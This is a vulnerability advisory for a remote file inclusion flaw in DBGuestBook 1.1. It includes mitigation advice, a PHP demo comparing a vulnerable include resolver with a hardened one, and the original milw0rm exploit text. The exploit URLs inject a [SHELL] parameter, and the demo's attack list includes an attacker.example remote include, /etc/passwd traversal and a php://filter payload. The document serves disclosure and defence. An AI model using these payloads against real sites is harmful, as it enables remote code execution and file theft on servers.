Vendor: DBGuestBook
Found by: Denven
CVSS: 7.5 (HIGH)
Vulnerability type: RFI
Product Name: DBGuestBook
Affected Version From: 1.1
Affected Version To: 1.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Year: 2007

DBGuestBook 1.1 RFI Vulnerability

DBGuestBook 1.1 is vulnerable to Remote File Inclusion (RFI), the weakness catalogued as CWE-98 (PHP Remote File Inclusion). Three library files under includes/ pass the variable $dbs_base_path to require_once without ever assigning it themselves; they expect the script that includes them to have set it. When one of these files is requested directly and the PHP installation has register_globals enabled, the attacker's query-string value becomes $dbs_base_path, and with allow_url_include (or, on PHP older than 5.2, allow_url_fopen) enabled, require_once fetches and executes a file from a server the attacker controls. The affected URLs are:

- http://SITE.com/path/includes/utils.php?dbs_base_path=[SHELL]
- http://SITE.com/path/includes/guestbook.php?dbs_base_path=[SHELL]
- http://SITE.com/path/includes/views.php?dbs_base_path=[SHELL]

where [SHELL] is the URL of attacker-hosted PHP code. The outcome is arbitrary code execution with the privileges of the web server process. Even where remote URLs are blocked at the PHP level, the value still reaches require_once unfiltered, so it can name arbitrary local files.

Mitigation:

No vendor patch is listed for this issue (see "Patch Exists: NO" above), so the fix has to be applied locally:

- Assign $dbs_base_path explicitly at the top of each include (for example from dirname(__FILE__)) instead of relying on the calling script, and refuse direct HTTP requests to the includes/ directory or move it outside the document root.
- Run PHP with register_globals=Off and allow_url_include=Off (and allow_url_fopen=Off where nothing legitimate needs it). This closes the remote case for the whole installation, not just this script.
- Wherever a path component must come from input, validate it against an allow-list of expected file names and check that the realpath() result stays under the intended directory.

To check whether a deployment is exposed, request one of the URLs above with a harmless marker value (not a real payload) and confirm the response is a 403 or an unchanged page. A PHP include warning that echoes the supplied value back means the request parameter is reaching require_once.
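The following is an added example and is not DBGuestBook's own code. It reproduces the pattern the advisory describes (an include path taken from an unassigned variable and handed straight to require_once) next to a hardened resolver that pins the base directory, allow-lists file names and verifies the resolved path with realpath(). Both are exercised against hostile and benign inputs. The function names, the allow-list, the attacker host attacker.example and the temporary application root are assumptions made for the demo.

```php
<?php
// Added example, not part of DBGuestBook. Demonstrates the RFI pattern from the
// advisory (require_once on a request-controlled $dbs_base_path) and a fix.

// Vulnerable: returns whatever reached the variable. In 2007-era PHP with
// register_globals=On, a request ?dbs_base_path=http://attacker.example/x.txt
// sets it, and with allow_url_include=On require_once fetches and runs it.
function vulnerable_include_path(string $dbs_base_path): string
{
    return $dbs_base_path;   // unchanged: remote URL, ../ traversal, php:// wrapper
}

// Hardened: the base directory is pinned by the application, the file name must
// be on an allow-list, and realpath() must place the result under the base.
function hardened_include_path(string $appRoot, string $name): string
{
    $allowed = ['config.php', 'db.php', 'lang.php'];   // assumed file set
    if (!in_array($name, $allowed, true)) {
        throw new InvalidArgumentException("include not allowed: $name");
    }
    $realBase = realpath($appRoot);
    $real     = realpath($appRoot . DIRECTORY_SEPARATOR . $name);
    $prefix   = $realBase === false ? '' : $realBase . DIRECTORY_SEPARATOR;
    if ($realBase === false || $real === false
        || strncmp($real, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException("include outside application root: $name");
    }
    return $real;
}

// Demo harness: a throwaway application root holding one legitimate config.php.
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'dbs_demo_' . getmypid();
mkdir($root);
file_put_contents("$root/config.php", "<?php \$dbs_config = 'ok';\n");

// Constructed attack values of the kind the advisory's [SHELL] placeholder covers.
$attacks = [
    'http://attacker.example/shell.txt',                        // remote include
    '../../../../etc/passwd',                                   // local traversal
    'php://filter/convert.base64-encode/resource=config.php',   // stream wrapper
];

foreach ($attacks as $p) {
    // The vulnerable resolver passes the payload through untouched.
    echo "vulnerable would include: " . vulnerable_include_path($p) . "\n";
    try {
        hardened_include_path($root, $p);
        echo "hardened ACCEPTED $p (unexpected)\n";
    } catch (Exception $e) {
        echo "hardened rejected: " . $e->getMessage() . "\n";
    }
}

// The legitimate file is still reachable and loads normally.
require_once hardened_include_path($root, 'config.php');
echo "loaded config: $dbs_config\n";

unlink("$root/config.php");
rmdir($root);
```

Run it with the PHP CLI (php example.php). The hardened resolver rejects all three hostile values and loads the real config.php. Note that the code-level fix complements, rather than replaces, the php.ini settings: with allow_url_include=Off and register_globals=Off the remote case cannot occur at all, while the allow-list and realpath() check also stop the local-file variant that those directives do not cover.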

Exploit-DB raw data:

DBGuestBook 1.1
 
*****************
Found by Denven *
*****************
Script: http://www.dbscripts.net/download/?file=2
*****************
ERROR:
 
includes/utils.php                               require_once $dbs_base_path
includes/guestbook.php                           require_once $dbs_base_path
includes/views.php                               require_once $dbs_base_path
 
 
 
**************************************************************************************
RFI:
 
http://SITE.com/path/includes/utils.php?dbs_base_path=[SHELL]
http://SITE.com/path/includes/guestbook.php?dbs_base_path=[SHELL]
http://SITE.com/path/includes/views.php?dbs_base_path=[SHELL]
 

**************************************************************************************
denven[at]gmail[dot]com

# milw0rm.com [2007-02-21]